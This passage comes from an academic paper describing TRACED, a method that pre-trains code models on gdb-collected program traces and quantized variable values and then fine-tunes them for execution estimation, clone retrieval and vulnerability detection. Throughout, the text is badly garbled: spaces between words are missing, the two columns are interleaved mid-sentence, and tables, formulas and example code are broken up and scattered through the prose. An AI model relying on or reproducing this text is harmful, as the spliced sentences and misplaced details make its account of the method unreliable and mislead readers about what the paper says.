Inthissection,weintroducehowTRACEDbuildsthelearnable featuresfromprogramtracesformodelstolearntheprogramexe- cutions. 3.1 RepresentingProgramStates Toimitatethewaythathumandevelopersmonitorvariablevalues tounderstandprogrambehavior,weproposetotrainneuralmodels with the log of runtime variable values to recognize execution patternsandinferdynamicprogrambehaviorsinawaythatis similartohumanintuition.Bytakingthelogofvariablevalues duringtheexecution,wecanrepresenttheprogramstatesina morecompactandinterpretableformthatismanageablefordeep neuralnetstoprocess. Webuildtheprogramstatebytakingsnapshotsofvariablevalues atprogrampointsduringexecution.Whenwetakeasnapshotata Figure2:OverviewofTRACEDworkflow. specifictimestep,similartothemomentthattheprogramispaused coveragelabelsthatwillhelpthemodeltocapturetheprogram byadebuggingbreakpointsetrightafterline𝑙,wemaintainavalue executions.Thedatasetfinallyendsupwithasetofsamplesand mapping,𝑀,tomapthevariabletoitscurrentvalue,similartothe labels,whereeachsampleincludesthesourcecodewithitsprogram valuemappingtableofthedebugger.Torecordtheprogramstate, inputandthelabelsrepresenttheexecutiontraceofthissample. wetakethevaluesnapshotaftereachlineofexecutionandlogthe variables’currentvalues. Stage-2:Execution-awarePre-trainingwithTraces. Weuti- Definition:ProgramState.Formally,wedefinetheprogramstate lizethepre-processedsamplesandlabelsobtainedfromStage-1to aftertheexecutionofaspecificline,𝑙,as𝑠(𝑙),representedasaset performsupervisedpre-training.Specifically,weuseaTransformer- ofvariablevaluesatthismoment: encoder-basedmodel[31]tolearntheprogramtracesandimprove themodel’sunderstandingofprogramexecution.Themodelcould 𝑠(𝑙)={𝑀(𝑣,𝑙) |𝑣 ∈𝑉, 𝑙 ∈𝐿} beeithertrainedfromscratchorloadedbythepre-trainedweights 𝑉 representsthesetofalltracedvariables,and𝐿isthesetof ofexistingcodelanguagemodels.Toachievethegoalofproduc- lineswithsourcecode.Figure3showsanillustrativeexampleofa ingexecution-awarecoderepresentation,weproposethreepre- simplefactorialprogramandthecommentsafterthesourcecode trainingobjectives.Thefirstobjectiveislearningtogeneratethe indicatetheprogramstateaftertheexecutionofthatline.Also, sourcecode.Webelievethatunderstandingthenaturalnessofcode wedonotlogtheprogramstateforlineswithoutexecutablecode, text[20,43]isfundamentalforthemodeltocapturemoresophisti- suchasline-8ofFigure3. catedsignalssuchasprogramexecution.Thisobjectiveisimple- mentedwithmaskedlanguagemodeling(MLM),whichmasksa 1 // INPUT: 4 certainpercentageoftokensinthesourcecodeandtrainsthemodel 2 int factorial() { toreconstructthemaskedtokensbasedonthesurroundingcontext. 3 int x, y; // {'x': 32767, 'y': 32767} Thesecondobjectiveislearningtopredicttheprogramstates.By 4 x = atoi(argv[1]); // {'x': 4, 'y': 32767} 5 if (x < 0) { // {'x': 4, 'y': 32767} predictingprogramstatelabelsthatweregeneratedinStage-1,the 6 y = -1; modellearnstocapturethedataflowsandthesideeffectsofcode 7 return y; execution.Thethirdobjectiveistopredicttheexecutioncoverage. 8 } BypredictingtheexecutioncoveragelabelsgeneratedbyStage-1, 9 y = 1; // {'x': 4, 'y': 1} themodellearnstocapturethedynamiccontrolflowandhelpsthe 10 for (int i = 1; i <= x; i++) // {'x': 4, 'y': 24, 'i': 5} 11 { modelunderstandhowtheprogramstateisreachedandevolving. 12 y *= i; // {'x': 4, 'y': 24, 'i': 5} 13 } 14 return y; // {'x': 4, 'y': 24, 'i': 5} Stage-3:Task-specificFine-tuning. Finally,weapplyTRACED 15 } toseveraldownstreamtasks.Weloadthepre-trainedweightsof TRACED,fine-tunethemodelforaspecifictask,andkeepupdating Figure3:Programstateswithconcreteruntimevalues. themodelweights.Fine-tuningdoesnotrequiretheprogramtobe executed;rather,TRACEDwillreasonabouttheexecutionstatically Notethatasourcecodelinecouldbeexecutedmultipletimesdue withitslearnedexecutionsignalsduringthepre-training,andlearn toalooporrecursion.Whileamoredetailedrepresentationofpro-
toaccomplishthetaskaccordingly.Inmanyusefulapplications, gramexecutionmightprovideadditionalinsights,italsoincreases wewouldnothaveprogramtracesavailable.Weconsiderthree thecomplexityandcomputationalrequirementsofthemodel.Asa downstreamtasksforTRACED:staticexecutionestimation,which trade-offbetweenthecomplexityandperformance,weusethelast includesexecutioncoverageandruntimevariablevaluepredictions, occurringexecutionofeachlinetofinalizetheprogramstates,so cloneretrieval,andvulnerabilitydetection. that𝑠(𝑙)keepsgettingupdateduntiltheexecutionterminates.ICSE2024,April2024,Lisbon,Portugal YangruiboDing,BenSteenhoek,KexinPei,GailKaiser,WeiLe,andBaishakhiRay Weapplysuchatrade-offbasedontheobservationsofrealexecu- Toreducethedatacomplexityandincreasethedensity,wedefine tions.Specifically,thelastoccurringvaluesaretypicallysufficient 30categoriesforquantizedvaluesinTable1.Tocomprehensively tocapturetheresultsofloopsandrecursions.Forexample,when representthevariablevalues,theproposedquantizedcategories callingarecursivefunction,onlythelastoccurringvalue(s)ofre- considerbothtypes,i.e.,thedatatypesandvaluetypes,thatare turnedvariable(s)willbetakentofulfillthefollowingexecutionof staticallydefined,andthedynamicruntimevalues.Ourquantized thecaller.Similarly,thefinalvalueswhenloopsfinishwilltakepart categoriescoverthemostcommonvariabletypesandvaluetypes, inthefutureexecution.Asshowninline-12ofFigure3,variable whichwehavefoundsufficienttocaptureimportantprogramex- ygetsmultipliedinsidealooptocalculatethefactorial.Itsvalue ecutionbehaviorsandrelationships.Byfocusingonthemostfre- changesineachiteration,butitislessinformativetoreasonabout quentvaluetypes,wecancapturetheessentialfeaturesofprogram theprogram’soverallbehavior,asonlythefinalvalueisusedas execution.Thismakesourapproacheffectiveatcapturingthegen- thereturnvalue(line-14).Thus,wewouldrepresentyusingthe eralizedprogramexecutionbehaviorsandpatterns.Weempirically valuefromthelastoccurringexecutionoftheloop. illustrateourquantizationstrategy’seffectivenessin§6.3. 3.3 BuildingLearnableLabelsforCodeModels 3.2 QuantizedVariableValues Weusedsupervisedpre-trainingwithtraces.Weconstructlabelsfor Asweintroducedin§1,thedistributionofconcretevaluesissparse codemodelstolearntwomainperspectivesofexecution:program andcomplex,consequentlydifficultforastatisticalmodeltofit.In statesandexecutioncoverage. addition,concretevaluesarenotalwaysnecessary.Somecommon programbehaviorsareaccompaniedbyextremelylargeorsmall ProgramStateLabels. Aswediscussedinprevioussections, variablevalues–forexample,inC,uninitializedvariablesareoften wefirsttracetheprogramvariablesduringexecutionandlogtheir settozerooruncommonlylargevariables,buttheconcretevalues runtimevalues.Wethenquantizethesevaluesintopre-defined arenotmeaningfulbecausetheydependonlyonthedataremaining categories.Thisprocessresultsinasequenceofprogramstates, onthestack,whichcouldberandomlylargeorsmall.Themodel eachrepresentedbyasetofquantizedvariablevalues(asshownin couldrepresentsuchbehaviorsbyestimatingthevaluerangesof Figure3),andwebuildthelearnablefeaturesforthecodemodelon variableswithoutaccuratelypredictingtheirconcretevalueswhich topoftheseprogramstates.Specifically,webuildlabelsforvariables arenotinformativeormeaningful.Figure3displayssomeofthese thatcanbequantizedintoTable1’scategoriesandtrainthemodelto cases:aftertheexecutionofline-3,xandyareuninitializedand predicttheselabelsgiventheirsourcecoderepresentations(§4.1.2). randomlyinitiatedas32,767,whichhasnoconcretemeaningbut Thelabelforeachvariableisrepresentedasatuple:(datatype, onlymakesthetrainingdatanoisyandsparse. valuetype,quantizedvalue).Forexample,inFigure3,thelabelof variableXoccurringatline-3is(Basic,Integer,PositiveLarge),asthe Table1:TRACED’sdesignofquantizedvariablevalues. currentvalueofXis32,767.Webuildsuchlabelsforalloccurrences ofvalidvariablesthatcanbequantized,andthesetcombiningall labelsisconsideredastheprogramstatelabelsofthecodesample. DataType ValueTypes ConcreteValue QuantizedValue 0<𝑣≤10,000 PositiveRegular ExecutionCoverageLabels. Tounifyourdesignandreducethe 10,000<𝑣 PositiveLarge complexityofthemodel’slearningprocess,wealsobuildexecution Integer 0 Zero −10,000≤𝑣<0 NegativeRegular coveragelabelsforeachoccurrenceofvariables,aligningwiththe 𝑣<−10,000 NegativeLarge programstatelabels.Specifically,werepresentthecoverageofa 0.0<𝑣≤1.0 PositiveSmall variablewithabinarylabel,“Yes"or“No".Thevariableswithin 1.0<𝑣≤10,000.0 PositiveRegular 10,000.0<𝑣 PositiveLarge the executed line will be labeled as “Yes", and those within the Float/Double 0.0 Zero unexecutedlineswillbelabeledas"No"andfurtherassignedwith Basic −1.0<𝑣<0 NegativeSmall an“Unknown"quantizedvaluewhileretainingtheirlabelsfortheir −10,000.0≤𝑣<−1.0 NegativeRegular datatypeandvaluetype.Forexample,inFigure3,Line-6isnot
𝑣<−10,000.0 NegativeLarge ‘\0’ Null executed,soyatthislinehasthecoveragelabelof“No"andthe Character 𝑣∈{a-zA-Z} Alphabetic programstatelabelof(Basic,Integer,Unknown),whileyatline-9 𝑣≠‘\0‘;𝑣∉{a-zA-Z} Non-alphabetic hasthecoveragelabelof“Yes"andtheprogramstatelabelof(Basic, 0 False Boolean Integer,PositiveRegular). 1 True Void - Void Integer 𝑞𝑢𝑎𝑛𝑡𝑖𝑧𝑒[𝑣 (1 𝑣, 𝑖𝑣 )2, ∈.. In., te𝑣 g𝑛 e] r; NotII nn ii tt ii aa ll ii zz ee dd 4 MODEL Array Float/Double 𝑞𝑢𝑎𝑛𝑡𝑖𝑧𝑒(𝑣𝑖)[ ∈𝑣 1 F, l𝑣 o2 a, t. /. D. o, u𝑣𝑛 bl] e; NotII nn ii tt ii aa ll ii zz ee dd I an ndth li es ars nec inti gon o, bw jece tie vx ep sla di un rit nh ge pd re et -a ti rl as io nf inT gR aA nC dE fiD ne’s -tc uo nm inp go .nents Initialized Character “⟨string⟩” NotInitialized ModelArchitecture. Figure4showsthehigh-levelarchitec- 0x0 Null tureof TRACED’spre-training.Thebackboneof TRACEDisa12- Integer Not0x0 NotNull layerTransformerencoder,similartoBERT[9]andRoBERTa[31], 0x0 Null Pointer Float/Double whichlearnsthegenericcoderepresentations.Ontopoftheback- Not0x0 NotNull 0x0 Null bone Transformer layers, TRACED stacks multiple multi-layer- Character Not0x0 NotNull perceptron (MLP) layers as prediction heads for different tasks.TRACED:Execution-awarePre-trainingforSourceCode ICSE2024,April2024,Lisbon,Portugal Duringthepre-training,asshowninFigure4,TRACEDapplies Notethattheexecutiontracesarenotpartofthemodelinput, a language model prediction head, i.e., LM layer, to predict the butareusedasgroundtruthlabelsforthemodeltopredictduring maskedtokengivenitscontextualizedrepresentation,aprogram pre-training. statepredictionheadtopredicttheprogramstateslabelsthatwe 4.1.2 LearningExecution-awareCodeRepresentationswithTraces. defined in § 3.3, and an execution coverage head to prediction TRACEDispre-trainedwithmultipleobjectivestojointlycapture the execution coverage labels. For the task-specific fine-tuning, thestaticanddynamicperspectivesofthesourcecode. thebackboneTransformerlayersareloadedwiththepre-trained weights,whilethepredictionheadsarereplacedbyanewlyinitial- LearningCodeText. Learningcodetextistheessentialfirst izedheadcustomizedforthespecificdownstreamtask. steptowardunderstandingtheexecutionofaprogram,ascodetext istheprimarysourceofcapturingthecodenaturalness[20]and otherstaticproperties.Weimplementthecodetextlearningobjec- tivebyadaptingthemaskedlanguagemodelobjective[9,16,31]. Specifically,giventhemodelinputsequence,I,TRACEDrandomly chooses15%oftokens[9,31]onlyfromthesourcecodesequence 𝐶partandreplaceswiththespecial[MASK]token(e.g.,printfin Figure4ismasked).Itleavestheexecutableinputsequence𝐸as is.Themodelistrainedtoencodethecontextof [MASK]intoits coderepresentation,𝑟 𝑚𝑎𝑠𝑘𝑒𝑑,andreconstructtheconcretemasked tokensconditionedontherepresentation.Werepresentthelossof learningcodetextas: ∑︁ L𝑐𝑜𝑑𝑒−𝑡𝑒𝑥𝑡 = −𝑙𝑜𝑔𝑃(𝑐 𝑚𝑎𝑠𝑘𝑒𝑑 |𝑟 𝑚𝑎𝑠𝑘𝑒𝑑) (1) 𝑚𝑎𝑠𝑘𝑒𝑑 InFigure4,theLM(LanguageModel)layerreceivesthemasked tokenrepresentationgeneratedbythelastTransformerlayer.The LMlayerthenpredictstheconcretetokensbymappingthetoken representationtotheprobabilityofeachtokeninthevocabulary, usinganMLP(Multi-LayerPerceptron)layer.Thisprocesscanbe thoughtofasaclassificationtask,wherethenumberofclassesis Figure4:High-levelmodelarchitectureofTRACED.Inthelabels equaltothesizeofthevocabulary.Thegoalistolearnamapping forprogramstatelayers,NEG_REGmeans“NegativeRegular",UNK fromthemaskedtokenrepresentationtothemostprobabletoken means“Unknown",andPOS_REGmeans“PositiveRegular",which inthevocabulary,givenitscontext. wehavedefinedinTable1. LearningProgramStates. Thesecondpre-trainingobjective, programstateprediction(PSP),isdesignedtoenablethemodelto learnprogramexecutionbehaviorbypredictingtheprogramstate 4.1 Execution-awarePre-training labelsofthetracedvariables.Theseprogramstatelabels,asdefined in§3.3,containinformationaboutthedatatypes,valuetypes,and 4.1.1 ModelInputofPre-training. Eachpre-trainingsamplein- quantizedvaluesofthevariablesattheendoftheprogramexecu- cludesthesourcecodeofanexecutableprogramandavalidexe- tion.Specifically,TRACEDfirstidentifiesthevariabletokensinthe cutableinput.AsshowninFigure4,theexecutableinputandthe sourcecodesequence,denotedas{𝑐 𝑣𝑎𝑟 |𝑐 𝑣𝑎𝑟 ∈𝑉}⊆𝐶,where𝑉 sourcecodeareflattenedandconcatenatedasonesequence.To isthesetofalltracedvariablesand𝐶isthesourcecodesequence. distinguishtheinputfromthesourcecode,astheyaredifferent modalities,TRACEDusesspecial[SEP]tokenstoseparatethem It then extracts the representation,𝑟 𝑣𝑎𝑟, of each variable token andfeedsitintotheprogramstatelayer.Theprogramstatelayer andindicateindividualpositions.Toalleviatetheout-of-vocabulary predictsthevariable’sjointlikelihoodofbeingtheground-truth concern of programming languages [25], TRACED takes a pre- datatype,𝑑 𝑣𝑎𝑟,valuetype,𝑡 𝑣𝑎𝑟,andquantizedvalue,𝑞 𝑣𝑎𝑟.Note trainedSentencePiece[28]subwordtokenizerwithvocabularysize thatifavariableistokenizedasmultiplesub-tokens,allbelonging of50,000.Itusesthistokenizertodividetheconcatenatedsequence sub-tokenssharethesameprogramstatelabel.Finally,TRACED
intoanewsequenceofsub-tokens. computesthelossofPSPasthesumofthelossesofallvariable Formally,wedefinetheexecutableinputsas𝐸={𝑒 1,...,𝑒 𝑖}and tokensusedforpredictingtheirprogramstates.Mathematically, flattenedsourcecodeas𝐶 ={𝑐 1,...,𝑐 𝑗},thenthefinalmodelinput thelossisexpressedasfollows: willbeI ={[CLS],𝑒 1,...,𝑒 𝑖,[SEP],[SEP],𝑐 1,...,𝑐 𝑗,[SEP]}.TRACED truncates the executable inputs and the source code separately ∑︁ if they are too long. TRACED sets the maximum length of the L𝑝𝑟𝑜𝑔𝑟𝑎𝑚−𝑠𝑡𝑎𝑡𝑒 = −𝑙𝑜𝑔𝑃(𝑑 𝑣𝑎𝑟,𝑡 𝑣𝑎𝑟,𝑞 𝑣𝑎𝑟 |𝑟 𝑣𝑎𝑟) (2) 𝑣𝑎𝑟 executableinputsequenceto64tokens,andthesourcecodeto 960tokens.Thesenumbersareselectedbasedonthestatisticsof LearningVariableCoverage. Thethirdpre-trainingobjective, executableinputs’lengthofourpre-trainingdataset(§5.2.1),and variablecoverageprediction(VCP),aimstolearntheexecution fittherestofthemodelinputwithsourcecode. coverage,whichiscrucialforunderstandingthecontrolflowofICSE2024,April2024,Lisbon,Portugal YangruiboDing,BenSteenhoek,KexinPei,GailKaiser,WeiLe,andBaishakhiRay thecodegivenaspecificinput.SimilartothePSPobjective,VCP andcapturethesimilarityamongthem.Itevaluatesthemodel’s targetsmakingpredictionsforvariabletokens.Thelabelofvariable semanticreasoningcapacitytoidentifythecodesimilarityand coverageisbinary,where1representsthelinethisvariablebelongs retrieveclones:givenaprogramasaquery,andanarbitrarycol- toiscovered,otherwise0.Also,sub-tokensbelongingtothesame lectionofprogramsascandidates,themodelneedstoidentifythe variablewillbeassignedthesamecoveragelabel.ThelossofVCP query’ssemanticclonesfrompossiblythousandsofcandidates. isasfollows: VulnerabilityDetection. Vulnerabilitydetectionisacrucial ∑︁ taskinsoftwaresecurity,aimingtoidentifypotentialsecurityvul- L𝑣𝑎𝑟−𝑐𝑜𝑣 = −𝑙𝑜𝑔𝑃(𝑐𝑜𝑣 𝑣𝑎𝑟 |𝑟 𝑣𝑎𝑟) (3) nerabilitiesinsoftwarecodethatcouldbeexploitedbyattackers. 𝑣𝑎𝑟 Thevulnerabilitiesmayexistduetovariousreasons,includingpro- Finally,TRACEDcombinesthelossesofallthreeobjectivesand grammingerrors,designflaws,orconfigurationissues.Detecting computestheirsumasthefinallossofapre-trainingsample.It thesevulnerabilitiesearlyinthesoftwaredevelopmentlifecycle back-propagatesthegradientsthroughboththepredictionlayers canpreventpotentialattacks,mitigaterisks,andsaveresources. andthebackboneTransformerlayerstoupdatetheirweights.We We fine-tune TRACED’s pre-trained model on datasets consist- denotethefullsetof TRACED’slearnableparametersas𝜃 and ingofvulnerableandnon-vulnerablecodesamples,sothemodel representthelossasfollows: learnstoclassifycodefunctionsasvulnerableornon-vulnerable byestimatingtheirexecutionbehavior. L(𝜃)=L𝑐𝑜𝑑𝑒−𝑡𝑒𝑥𝑡(𝜃)+L𝑝𝑟𝑜𝑔𝑟𝑎𝑚−𝑠𝑡𝑎𝑡𝑒(𝜃)+L𝑣𝑎𝑟−𝑐𝑜𝑣(𝜃) (4) 5 EXPERIMENTALSETUP 4.2 Task-specificFine-tuning 5.1 TraceCollection TRACEDloadsthemodelweightsofTransformerslayers,which Inthissection,weexplainhowwetracedthedynamicinformation arepre-trainedtoproduceexecution-awarecoderepresentations, inprogramstoproduceconcretetraces,giventhesourcecodeand andfurtherfine-tunesthemodelfordownstreamtasks.Weconsider programinput. threedownstreamtasksasthemainapplicationsforTRACED:(1) First,wecompiletheprogramusinggccwiththeoptions-g -O0. Staticestimationofprogramexecutionwhichincludesbothexecu- Option-gpreservesdebuginformation,whichisnecessaryinorder tioncoveragepredictionandruntimevariablevalueprediction;(2) toreadvariablesandsourcecodelocationsusingthedebugger,and SemanticCloneRetrieval;(3)VulnerabilityDetection. option-O0disablescompileroptimizations,whichcouldoptimize StaticExecutionEstimation. Ourgoalofpre-trainingisto outsomevariablesthuspreventingthemfrombeingreadatruntime. encode the execution patterns into the code representation, so Weusethisoptionbecauseweseektomodelthesemanticsofthe themodelcouldestimatetheprogramexecutionstatically.Asa sourcecodeintermsofvariablevaluesratherthantheoptimized directapplication,TRACEDfine-tunesthemodeltopredict(1)the machinecode. executioncoverageand(2)runtimevariablevaluesusingsource Second, we load the program with the given standard input codeandprograminput.TRACEDevaluatesthefine-tunedmodel redirectedtostdinandattachthegdb2debugger,usingthePython toestimatetheexecutionofunseenprogramsinthesameway. APItoimplementthetracingcommand.Startingfromtheentry Specifically,forexecutioncoverageprediction,TRACEDiden- point(main),weexecutetheprogramonelineatatimeusingthe tifies all the branching statements to locate the branches, 𝐵 = stepcommand.Ateachline,weprintouttheconcretevaluesof {𝑏 1,𝑏 2,...,𝑏 𝑚},withinthesourcecode.Ittrainsthemodeltopre- allvariablesinscope.Wealsosetbreakpointsattheentryofeach dictabinarylabel,0meansthebranchisnotcoveredbythecurrent user-definedfunction,wherewelogthevaluesofeachparameter. executionand1meanscovered,foreach𝑏 𝑖 ∈𝐵.Forthemodel’scon- Fornumerictypes,wesimplylogtheirstringrepresentation.For veniencetomakepredictions,thespecialtoken[MASK]isinsertedat charandchar *(string)types,welogthehuman-readablevalues
thebeginningofeachbranch.Forexample,thefollowingif-else ofthechars/strings.Weusegdb’spretty-printertoprintstruct hastwobranchesthatarepre-processedforbranchprediction:if typesandstaticallyallocatedarraytypes,suchasint[<size>]. (condition) {[MASK] ...} else {[MASK] ... }.Duringthe Forpointertypes,weprintthememoryaddressofthepointeras fine-tuning, the Transformer layers learn to encode the branch ahexcode.Weonlytracedthefunctionsthatweredefinedinthe informationintothecorresponding[MASK]tokenrepresentation sourcecodeandskippedoverallstandardlibraryfunctions. withthebuilt-inbi-directionalattentionandpositionalencoding. 5.2 Dataset Thentheclassificationheadtakes[MASK]representationstopredict whetherabranchiscoveredbythecurrentexecution.Forvariable 5.2.1 Pre-trainingDataset. IBM’sCodeNetDataset[41]includes valueprediction,TRACEDidentifiesvariables,𝑉 ={𝑣 1,𝑣 2,...,𝑣 𝑛} 4,053programmingchallengesforseveralprogramminglanguages andtrainsthemodeltopredicttheirquantizedvalues(§3.2)during from the AIZU Online Judge and AtCoder platforms, and each theexecution. problem has up to thousands of implementations submitted by distinctprogrammers.Inthiswork,wefocusontheClanguage SemanticCloneRetrieval. Detectingsemanticclonesissignif- asthemainresourceforthepre-traininganddownstreamtasks, icantforsoftwaremaintenance[26,30],yetverychallengingin sowebuildourpre-trainingdatasetwithprogrammingchallenges practicesincethetokenandsyntacticstructuresoverlapamong thathaveCsolutions.Besidesthelargenumberofsamplesand semanticclonesmaybequitelimited.Thistaskrequiresthemodel toestimatetheprogrambehaviorswithoutexecutingtheprograms 2https://www.sourceware.org/gdbTRACED:Execution-awarePre-trainingforSourceCode ICSE2024,April2024,Lisbon,Portugal thecomplexityofprogrammingchallenges,wechooseCodeNetto benignsamples.TheD2Adatasetisabalanceddatasetfocusing buildourdatasetsasitmaintainsatleastoneandatmosttwenty onbug-fixingcommits.Itlabelsthepreviousversionofmodified executableinputsforeachchallenge,sowecouldexecuteandtrace functionsasbuggyandthefixedversionasbenign.Finally,the theimplementationsofthechallenge,andconsequentlybuildour CodeXGLUE-Devigndataset,introducedbyZhouetal.,isalsoa executionlabelsforthemodeltolearn. balanceddatasetthathasbeenreconstructedasapublicbenchmark Outof1,900programmingchallengeswithCsolutions,weselect byCodeXGLUE,ensuringthatallmodelscanbeevaluatedusing 1,805ofthemtobuildthepre-trainingdatasetandleavetheother thesametrain/valid/testsplits. 95problemsasheld-outproblemsforevaluatingthemodel’scapac- Metrics.REVEALisanimbalanceddataset,soweuseF1asthe ityforthedownstreamstaticexecutionestimationtask.Splitting evaluationmetric.D2AandDevignarebalanceddatasets,sowe samplesstrictlybychallengeeffectivelyavoidstheissueofdata followtheoriginalbenchmarktoreporttheclassificationaccuracy. leakage from the training set to the held-out set. We randomly sampleupto200executiontracesforeachchallenge,andthisends Table2:Detailsofdownstreamtasksdatasets. upwith121,319trainingtraces. Task Dataset Train Valid Test 5.2.2 Downstreamtasks. Inthissection,weintroducethedatasets ExecutionEstimation CodeNet 121,319 13,116 13,116 weuseforeachdownstreamtaskandexplainthecorresponding CloneDetection CXG-POJ104 32,000 8,000 12,000 evaluationmetrics.ThestatisticsofthesedatasetsareinTable2. REVEAL 15,867 2,268 4,535 Static Execution Estimation. We build the dataset for this VulnerabilityDetection D2A 4,644 597 619 taskusingCodeNet.Webuildthetrainingsamplesfromthe1,805 CXG-Devign 21,854 2,732 2,732 challengesthathavebeenselectedbythepre-training,andbuild evaluationsamplesfromtheheld-out95challengestoavoidmodel memorizationanddataleakage. Metrics.Fortheexecutioncoverageprediction,weconsiderevalu- 5.3 ModelConfiguration ationmetricsintwogranularities:fullexecutionpathandbranch coverage.Concretely,forasamplewith𝑚branches,wedenotethe TRACED’sbackboneisastandardRoBERTaBASEarchitecture[31] with12layersofTransformer-encoder,andeachlayerhas12atten- fullsetoftheirlabelsas𝐿𝐵={𝑙𝑏 1,𝑙𝑏 2,...,𝑙𝑏 𝑚},andthemodelpre- tionheadsandthehiddendimensionis768.TRACEDisinitialized dictionsetas𝐿ˆ𝐵={𝑙𝑏ˆ 1,𝑙𝑏ˆ 2,...,𝑙𝑏ˆ 𝑚}.If𝐿𝐵==𝐿ˆ𝐵,weregardthepre- withthepre-trainedweightsfromUnixCoder[17]4,andweuse dictionasmatchingthefullexecutionpath.Forthebranchcoverage, itsBPEtokenizertosplittheraretokensintoBPEsub-tokens.The wecomputetheoccurrenceof𝑙𝑏 𝑖 ==𝑙𝑏ˆ 𝑖,where1≤𝑖 ≤𝑚,andre- maximumsequencelengthis1024BPEtokens,andthelongerse- porttheaccuracy,precision,recall,andF1.Similarly,forthe𝑛quan- quencewillbetruncated.Whenthecodesampleispairedwith tizedvariablevalueswithintheprogram,𝑄𝑉 ={𝑞𝑣 1,𝑞𝑣 2,...,𝑞𝑣 𝑚}, executableinputs,themaximumlengthfortheexecutableinput ourmodelmakespredictionsas𝑄ˆ𝑉 ={𝑞𝑣ˆ1,𝑞𝑣ˆ2,...,𝑞𝑣ˆ𝑚}.If𝑄𝑉 == is64,andthesourcecodeis960.Ourexperimentsareconducted 𝑄ˆ𝑉,wesaythemodelaccuratelypredictsthefullexecution.Forthe on2×24GBNVIDIAGeForceRTX-3090GPUs.Wefurtherpre- individualvaluematch,wecomputetheoccurrenceof𝑞𝑣 𝑖 ==𝑞ˆ𝑣
𝑖 trainthemodelfor10epochstolearntheprogramexecutionwith andreporttheaccuracy. twolearningrates,5e-5and2e-5,andreportthebest-performing SemanticCloneRetrieval. WeuseCodeXGLUE-POJ104[32, modelsfordownstreamtasks.Forallthefine-tuningtasks,weuse 33]asthedatasetforthistask.CodeXGLUE-POJ104contains104 thelearningrateof8e-6.Learningratestypicallydecreaseforlater programmingchallenges,andeachhas500C/C++solutionssub- phases[10,16,18],soTRACEDfollowsthesamedesign.Weuse mittedbydifferentprogrammers.CodeXGLUE[32]reconstructs Adamoptimizer[27]withthelinearlearningratedecay.Ourmodel it as a public benchmark by splitting the dataset into Train (64 isimplementedmainlywithPytorch[12]andHuggingface[14]. challenges),Dev(16challenges),andTest(24challenges)sets,with nooverlappedchallengebetweenanytwosets. 6 EVALUATION Metrics.MAP@R(MeanAveragePrecision@R)3isthemainmet- Inthissection,weaskthefollowingfourRQs: ricofthistask,wherewefollowthedesignoftheCodeXGLUE benchmark.AverageprecisionatRisacommonmetrictoevaluate • RQ1:HoweffectiveisTRACEDinstaticallyestimatingthepro- thequalityofinformationretrieval;itmeasurestheaveragepre- gramexecution? cisionscoresofasetofthetop-Rclonecandidatespresentedin • RQ2:Howdoesourproposedtrainingstrategycontributeto responsetoaqueryprogram.The"R"forCodeXGLUEis499asit learningtheprogramexecution? has500solutionsforeachchallenge. • RQ3:Isourproposedquantizedvaluesforprogramseffectivein guidingthemodeltolearnprogramexecutions? VulnerabilityDetection. Weutilizedthreepubliclyavailable • RQ4:HowdoesTRACEDperformw.r.t.staticallypre-trained datasets:REVEAL(RV)[8],D2A[53],andCodeXGLUE-Devign baselinesforcodeunderstandingtasks? (CXG)[32,54].TheREVEALdatasetwascuratedbyChakraborty etal.tosimulateareal-worldscenariowherebugsarerelatively rare,resultinginaratioofapproximately1:10betweenbuggyand 4Specifically,weloadunixcoder-base-nine,asitspre-trainingconsidersClanguage codesamples:https://huggingface.co/microsoft/unixcoder-base-nine.Notethatthis 3https://en.wikipedia.org/wiki/Evaluation_measures_(information_retrieval)#Mean_ checkpointispre-trainedonlywiththeMLMobjective,whiletheoriginalpaper[17] average_precision reportsotherbetter-performingvariantsthatarenotreleasedpublicly.ICSE2024,April2024,Lisbon,Portugal YangruiboDing,BenSteenhoek,KexinPei,GailKaiser,WeiLe,andBaishakhiRay 6.1 RQ1.Effectivenessof TRACEDinStatic //Input: 19 100 EstimationofExecution #include <stdio.h> int main(){ Inthissection,wedemonstratetheeffectivenessof TRACEDin int A, N, T, B; staticallyestimatingprogramexecution.Theevaluationismore scanf("%d %d", &N, &A); T = N * N; challengingandrealisticthanTRACED’spre-trainingasitrequires B = T - A; the model to predict not only for individual variables but also if (A > 0) {printf("%d", B);} // Branch-1 branchesandthefullexecutionpath. else {printf("%d", T);} // Branch-2 Baseline. In this RQ, we mainly compare the execution-aware return 0; } TRACEDwithUnixCoder[17].Nowweexplainthereasonsforthis UnixCoderPredictions(Wrong) choice.First,TRACEDisinitializedwiththepre-trainedUnixCoder weights,socomparingTRACEDwiththeUnixCoderperformanceis Branch-1: Notexecuted adirectassessmentoftheimpactofourproposedpre-training.Sec- Branch-2: Notexecuted ond,UnixCoderreportsthestate-of-the-artperformanceinmany TRACEDPredictions(Correct) tasks,includingclonedetection,codesearchandsummarization, Branch-1: Executed andcodegenerationandcompletion,significantlyoutperforming Branch-2: NotExecuted otherpre-trainedcodemodels,suchasCodeBERT[16]andGraph- CodeBERT[18].Third,itconsumesupto1,024tokens,whilemost Figure5:Thequalitativeexampleofexecutioncoverageprediction. pre-trainedcodemodels[1,6,16,18,49]takeatmaximum512to- ThesourcecodeisthesameasFigure1,buttheinputtriggersa kens.Byconsuminglongersequences,UnixCoderisabletohandle differentexecutionpath.TRACEDcorrectlyflipstheprediction longerprogramsandmakecompletepredictionswithouttruncat- whileUnixCoderremainsthesameprediction. ingcodeinmanycases.AsTRACEDisalsodesignedtoconsume 1,024tokens,itisnotfairtocompareitinthistaskwithbaselines //Input: 4 4320 4320 4320 withamaximumlengthof512,asthebaselineswillnecessarily #include <stdio.h> considerfewerbranchesforprediction. int main (void) { int n, a, max = 0, sum = 0, i; Table3:Performanceonstaticexecutionestimation. for (i = 0; i < n; i++){ // Quantized value of n? scanf("\%d", &a); if (a > max) max = a; Coverage RuntimeValue sum += a; Model FullPath Branch FullExec Var } Acc Acc Prec Rec F1 Acc Acc printf("\%d\\n" , sum - max / 2); UnixCoder 63.7 79.7 81.7 85.4 83.5 39.3 87.8 return 0; TRACED 71.6 83.1 84.6 88.1 86.3 49.2 89.2 }
